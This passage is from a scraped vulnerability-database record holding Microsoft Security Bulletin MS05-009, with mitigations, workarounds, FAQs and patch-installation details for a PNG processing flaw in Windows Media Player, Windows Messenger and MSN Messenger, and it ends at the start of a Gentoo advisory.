Vulnerability and Exposure number CAN-2004-0597.\r\n\r\nIs this vulnerability the same as the vulnerability described in CAN-2004-0597?\r\nWhile similar to the vulnerability described here, Windows Media Player does not use or incorporate the affected libpng library. However, Windows Media Player is configured in such a way that makes it susceptible to the vulnerability described here.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\n PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597: \r\n\r\nA remote code execution vulnerability exists in Windows Messenger because it does not properly handle corrupt or malformed PNG files. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597 : \r\n\r\n\u2022 The nature of the vulnerability is different in Windows Messenger than in MSN Messenger or Windows Media Player. The vulnerability in Windows Messenger would be very complex to exploit and requires a large amount of effort and knowledge about the internal network of an organization to attempt to exploit this vulnerability.\r\n \r\n\u2022 A user would have to be running Windows Messenger and have it configured to receive .NET Alerts.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597 : \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified below.\r\n\r\nTurn off the .NET Alerts feature in Windows Messenger.\r\n\r\n\u2022 Open Windows Messenger\r\n \r\n\u2022 Go to the Tools menu and select \u201cOptions\u201d\r\n \r\n\u2022 In the Options Dialog go to the \u201cPrivacy\u201d tab.\r\n \r\n\u2022 Check the option that says \u201cDon\u2019t download any tabs to my computer\u201d\r\n \r\n\r\nNote this setting will take effect the next time you sign into Windows Messenger.\r\n.Net Alerts are only available on Passport accounts that have signed up to receive them. Users who have never configured their account to receive these alerts will not have this setting available.\r\n\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597: \r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nWindows Messenger implements the public lipng 1.2.5 version library that is recently found to have several known vulnerabilities.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics (PNG) format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nThe vulnerability in Windows Messenger would be very complex to exploit and requires a large amount of effort and knowledge about the internal network of an organization to attempt to exploit this vulnerability. An attacker would either need the ability to spoof the .NET Messenger service, or would have to intercept and rewrite communications between the client and the server. Simply sending a malformed PNG image file to Windows Messenger does not exploit this vulnerability.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nNo. None of these vulnerabilities are critical in severity on Windows 98, on Windows 98 Second Edition, or on Windows Millennium Edition. For more information about severity ratings, visit the following Web site.\r\n\r\nCould the vulnerability be exploited over the Internet? \r\nNo. An attacker would either need the ability to spoof the .NET Messenger service, or would have to intercept and rewrite communications between the client and the server.\r\nSimply sending a malformed PNG to Windows Messenger does not exploit this vulnerability. Microsoft has provided information about how you can help protect your PC. End users can visit the Protect Your PC Web site. IT Professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update addresses the vulnerability by updating the library used by Windows Messenger to one that completely validates the PNG image file that is being processed. Additionally, Windows Messenger will now validate that PNG image files are properly formatted.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nThese vulnerabilities have been publicly released and assigned Common Vulnerability and Exposure number CAN-2004-0597, CAN-2004-0598 and CAN-2004-0599.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\n PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nA remote code execution vulnerability exists in MSN Messenger because it does not properly handle corrupt or malformed PNG image files. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\n\u2022 MSN Messenger, by default, does not allow anonymous people to send you messages. An attacker would first need to entice you to add them to your contacts list.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified below.\r\n\r\n\u2022 Do not add addresses that you do not recognize or trust to your contacts list.\r\n \r\n\u2022 Review all of the contacts currently in your contact list and remove or block any that you do not know, do not trust or no longer need.\r\n \r\n\u2022 Disable display picture in MSN Messenger using the following steps:\r\n\r\nClick Tools. Click Options. Click the Personal Tab\r\n\r\nClear the check box \u2018Show Display Picture from Others in Instant Message Conversations\u2019.\r\n \r\n\u2022 Disable Emoticons using the following steps:\r\n\r\nClick Tools. Click Options. Click the Messages Tab\r\n\r\nClear the check box \u2018Show emoticons in instant messages\u2019\r\n\r\nClear the check box \u2018Show custom emoticons in instant message\u2019.\r\n \r\n\u2022 Do not agree to accept file transfers from contacts you do not know or trust.\r\n \r\n\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nIs the MSN Messenger 7.0 beta affected by this vulnerability?\r\nNo. This vulnerability was reported prior to the release of the MSN Messenger 7.0 beta, and is therefore already incorporated into that product version.\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nMSN Messenger implements the public lipng 1.2.5 version library that is recently found to have several known vulnerabilities.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics (PNG) format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAn attacker would likely seek to exploit this vulnerability by convincing a user to add them to their contacts list, and sending a specially crafted emoticon or display picture.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nYes. Customers running an affected version of MSN Messenger should install the updated version of MSN Messenger.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by updating the library used by MSN Messenger to one that correctly validates the PNG file being passed to it.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nThese vulnerabilities have been publicly released and assigned Common Vulnerability and Exposure number CAN-2004-0597 .\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\nTop of section\r\n Security Update Information \r\n\r\nInstallation Platforms and Prerequisites:\r\n\r\nFor information about the specific security update for your platform, click the appropriate link:\r\n\r\n Microsoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003 \r\n\r\nPrerequisites\r\nThis security update requires Windows Media Player 9 on Windows 2000 Service Pack 3 (SP3) or Service Pack 4 (SP4) or Windows XP Service Pack 1 (SP1) or Windows Server 2003.\r\n\r\nThe software that is listed has been tested to determine if the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support lifecycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting setup\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the previous version of the setup utility uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows Media Player 9 Series on Windows 2000:\r\n\r\nWindowsMediaPlayer9-KB885492-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows Media Player 9 Series on Windows XP and Windows Server 2003:\r\n\r\nWindowsMediaPlayer9-KB885492-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB885492$\Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nMicrosoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003:\r\n\r\nFile Name Version Date Time Size \r\nWmp.dll\r\n 9.0.0.3250\r\n 04-Aug-2004\r\n 07:56\r\n 4,874,240\r\n \r\n\r\nNote When you install this security update on Windows Server 2003, the installer checks to see if any of the files that are being updated on your system have previously been updated by a Microsoft hotfix. If you have previously installed a hotfix to update an affected file, the installer copies the RTMQFE files to your system. Otherwise, the installer copies the RTMGDR files to your system.\r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry key.\r\n\r\nMicrosoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Media Player\wm885492\r\n\r\nNote This registry key may not contain a complete list of installed files. Also, this registry key may not be created correctly if an administrator or an OEM integrates or slipstreams the 885492 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 4.7.0.2009 on Windows XP Service Pack 1 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows Messenger version 4.7.0.2009 (when running on Windows XP Service Pack 1)\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /Q Specifies quiet mode, or suppresses prompts, when files are being extracted.\r\n\r\n /Q:U Specifies user-quiet mode, which presents some dialog boxes to the user.\r\n\r\n /Q:A Specifies administrator-quiet mode, which does not present any dialog boxes to the user.\r\n\r\n /T: <full path> Specifies the target folder for extracting files.\r\n\r\n /C Extracts the files without installing them. If /T: path is not specified, you are prompted for a target folder.\r\n\r\n /C: <Cmd> Override Install Command defined by author. Specifies the path and name of the setup .inf or .exe file.\r\n\r\n /R:N Never restarts the computer after installation.\r\n\r\n /R:I Prompts the user to restart the computer if a restart is required, except when used with /Q:A.\r\n\r\n /R:A Always restarts the computer after installation.\r\n\r\n /R:S Restarts the computer after installation without prompting the user.\r\n\r\nNote These switches do not necessarily work with all updates. If a switch is not available that functionality is necessary for the correct installation of the update. Also, the use of the /N:V switch is unsupported and may result in an unbootable system. If the installation is unsuccessful, you should consult your support professional to understand why it failed to install.\r\n\r\nFor additional information about the supported setup switches, see Microsoft Knowledge Base Article 197147.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, and not force the system to restart, use the following command at a command prompt for Windows 2000 Service Pack 3, Windows 2000 Service Pack 4, Windows XP Service Pack 1, or Windows Server 2003:\r\n\r\nWindowsMessenger-KB887472-PreXPSP2-ENU /q:a /r:n\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nThis update cannot be uninstalled.\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger version 4.7.0.2009 on Windows XP Service Pack 1:\r\n\r\nFile Name Version Date Time Size \r\nMsmsgs.exe\r\n 4.7.0.2010\r\n 16-Nov-2004\r\n 00:18\r\n 1,670,144\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n1.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n \r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by confirming that an is Installed DWORD value with a data value of 1 exists in the following registry key:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 887472 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 4.7.0.3000 on Windows XP Service Pack 2 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft 4.7.0.3000 (when running on Windows XP Service Pack 2)\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting setup\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the previous version of the setup utility uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows XP Service Pack 2:\r\n\r\nWindowsXP-KB887472-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows XP Service Pack 2:\r\n\r\nWindowsXP-KB887472-x86-enu /norestart\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nFor Windows XP Service Pack 2: System administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe is located in the %Windir%\$NTUninstallKB887472$\Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger version 4.7.0.3000 on Windows XP Service Pack 2:\r\n\r\nFile Name Version Date Time Size Folder \r\nMsmsgs.exe\r\n 4.7.0.3001\r\n 13-Oct-2004\r\n 16:24\r\n 1,694,208\r\n SP2GDR\r\n \r\nMsmsgs.exe\r\n 4.7.0.3001\r\n 13-Oct-2004\r\n 16:21\r\n 1,694,208\r\n SP2QFE\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB887472\Filelist\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 887472 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 5.0 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows 2000 Service Pack 4, Windows Server 2003, Windows XP Service Pack 1, or Windows XP Service Pack 2.\r\n\r\nInstallation Information\r\n\r\nThis security update is packaged using Windows Installer Version 3.0. For more information, see the product documentation.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger 5.0 on Windows 2000 Service Pack 4, Windows Server 2003, Windows XP Service Pack 1, Windows XP Service Pack 2, or Windows XP Tablet PC Edition:\r\n\r\nFile Name Version Date Time Size \r\nmsmsgs.exe\r\n 5.1\r\n 05-Aug-2003\r\n 17:29\r\n 1,578,160\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n1.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n \r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n\r\nTop of section\r\n\r\n MSN Messenger 6.1 or 6.2 \r\n\r\nPrerequisites\r\n\r\nThis security update requires MSN Messenger 6.1 or 6.2.\r\n\r\nRestart Requirement\r\n\r\nThis update may require you to restart your computer.\r\n\r\nRemoval Information\r\n\r\nThis update cannot be uninstalled.\r\n\r\nVerifying Update Installation\r\n\r\nTo verify that a security update is installed on an affected system, please perform the following steps:\r\n\r\n1.\r\n Within MSN Messenger, Click Help, then About.\r\n \r\n2.\r\n Check the version number.\r\n \r\n\r\nIf the Version number reads 6.2.205 or above the update has been successfully installed.\r\n\r\nTop of section\r\nTop of section\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\r\n\u2022 Carlos Sarraute of Core Security Technologies for reporting the MSN Messenger PNG Processing Vulnerability (CAN-2004-0597).\r\n \r\n\r\nObtaining Other Security Updates:\r\n\r\nUpdates for other security issues are available from the following locations:\r\n\r\n\u2022 Security updates are available from the Microsoft Download Center. You can find them most easily by doing a keyword search for "security_patch."\r\n \r\n\u2022 Updates for consumer platforms are available from the Windows Update Web site.\r\n \r\n\r\nSupport: \r\n\r\n\u2022 Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n \r\n\u2022 International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n \r\n\r\nSecurity Resources: \r\n\r\n\u2022 The Microsoft TechNet Security Web site provides additional information about security in Microsoft products.\r\n \r\n\u2022 Microsoft Software Update Services\r\n \r\n\u2022 Microsoft Baseline Security Analyzer (MBSA)\r\n \r\n\u2022 Windows Update\r\n \r\n\u2022 Windows Update Catalog: For more information about the Windows Update Catalog, see Microsoft Knowledge Base Article 323166.\r\n \r\n\u2022 Office Update \r\n \r\n\r\nSoftware Update Services:\r\n\r\nBy using Microsoft Software Update Services (SUS), administrators can quickly and reliably deploy the latest critical updates and security updates to Windows 2000 and Windows Server 2003-based servers, and to desktop systems that are running Windows 2000 Professional or Windows XP Professional.\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nSystems Management Server:\r\n\r\nMicrosoft Systems Management Server (SMS) delivers a highly-configurable enterprise solution for managing updates. By using SMS, administrators can identify Windows-based systems that require security updates and to perform controlled deployment of these updates throughout the enterprise with minimal disruption to end users. For more information about how administrators can use SMS 2003 to deploy security updates, visit the SMS 2003 Security Patch Management Web site. SMS 2.0 users can also use Software Updates Service Feature Pack to help deploy security updates. For information about SMS, visit the SMS Web site.\r\n\r\nNote SMS uses the Microsoft Baseline Security Analyzer, Microsoft Office Detection Tool and an Enterprise Update Scanning Tool to provide broad support for security bulletin update detection and deployment. Some software updates may not be detected by these tools. Administrators can use the inventory capabilities of the SMS in these cases to target updates to specific systems. For more information about this procedure, visit the following Web site. Some security updates require administrative rights following a restart of the system. Administrators can use the Elevated Rights Deployment Tool (available in the SMS 2003 Administration Feature Pack and in the SMS 2.0 Administration Feature Pack) to install these updates.\r\n\r\nDisclaimer: \r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\r\n\u2022 V1.0 (February 8, 2005): Bulletin published\r\n \r\n", "edition": 1, "modified": "2005-02-08T00:00:00", "published": "2005-02-08T00:00:00", "id": "SECURITYVULNS:DOC:7769", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7769", "title": "Microsoft Security Bulletin MS05-009 Vulnerability in PNG Processing Could Allow Remote Code Execution (890261)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2004-0758", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0763"], "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 200408-22\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Normal\r\n Title: Mozilla, Firefox, Thunderbird: New releases fix\r\n vulnerabilities\r\n Date: August 23, 2004\r\n Bugs: #57380, #59419\r\n ID: 200408-22\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - 